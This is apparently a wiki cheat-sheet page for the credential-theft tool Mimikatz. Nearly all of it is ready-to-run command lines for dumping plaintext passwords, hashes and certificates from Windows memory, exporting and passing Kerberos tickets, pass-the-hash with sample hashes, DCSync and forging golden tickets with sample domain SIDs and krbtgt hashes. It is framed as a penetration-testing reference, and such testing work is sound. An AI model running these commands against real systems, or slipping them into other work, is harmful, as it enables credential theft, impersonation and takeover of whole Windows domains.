[[Category:Tools]]
=Description=
Mimikatz<ref>https://github.com/ParrotSec/mimikatz</ref> is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. It can also be used for other tasks such as generating Kerberos tickets and extracting digital certificates.
==== Links: ====
<syntaxhighlight lang="powershell">
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
</syntaxhighlight>
=Commands=
==sekurlsa==
<syntaxhighlight lang="powershell">
# Extracts logon passwords from the Windows Security Support Provider (SSP).
sekurlsa::logonpasswords
# Extracts all logon passwords, including those of network connections.
sekurlsa::logonPasswords full
# Exports Kerberos tickets to a file.
sekurlsa::tickets /export
# Performs a pass-the-hash attack: authenticates as the specified user with the provided NTLM hash and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
</syntaxhighlight>
==kerberos==
<syntaxhighlight lang="powershell">
# Lists and exports Kerberos tickets to a file.
kerberos::list /export
# Impersonates a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi
# Creates a Golden Ticket, a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The parameters set the properties of the ticket, such as the administrator account and the domain SID.
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
</syntaxhighlight>
==crypto==
<syntaxhighlight lang="powershell">
# Extracts cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi
# Extracts cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng
# Exports certificates from a Windows system.
crypto::certificates /export
# Exports certificates from the local machine certificate store.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# Exports cryptographic keys from a Windows system.
crypto::keys /export
# Exports cryptographic keys from the local machine store.
crypto::keys /machine /export
</syntaxhighlight>
==vault & lsadump==
<syntaxhighlight lang="powershell">
# Extracts credentials from the Windows Vault.
vault::cred
# Lists the contents of the Windows Vault.
vault::list
# Elevates the current user's privileges to those of the Local System account.
token::elevate
# Reverts the current user's privileges to their state before elevation.
token::revert
# Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam
# Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets
# Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache
# Performs a DCSync attack, which replicates Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
</syntaxhighlight>
==PTH==
<syntaxhighlight lang="powershell">
# Authenticates as the specified user with the provided NTLM hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
# Authenticates as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Authenticates as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
# Authenticates as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
</syntaxhighlight>
==ekeys==
<syntaxhighlight lang="powershell">
# Extracts EKEYS (Encrypted Key) keys from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys
</syntaxhighlight>
==dpapi==
<syntaxhighlight lang="powershell">
# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi
</syntaxhighlight>
==minidump==
<syntaxhighlight lang="powershell">
# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp
</syntaxhighlight>
==PTT==
<syntaxhighlight lang="powershell">
# Impersonates a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
</syntaxhighlight>
==Golden & Silver Tickets==
<syntaxhighlight lang="powershell">
# Creates a Golden Ticket, a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
</syntaxhighlight>
==tgt==
<syntaxhighlight lang="powershell">
# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt
# Removes TGTs from memory.
kerberos::purge
</syntaxhighlight>
=References=
<references />
Latest revision as of 04:47, 21 August 2023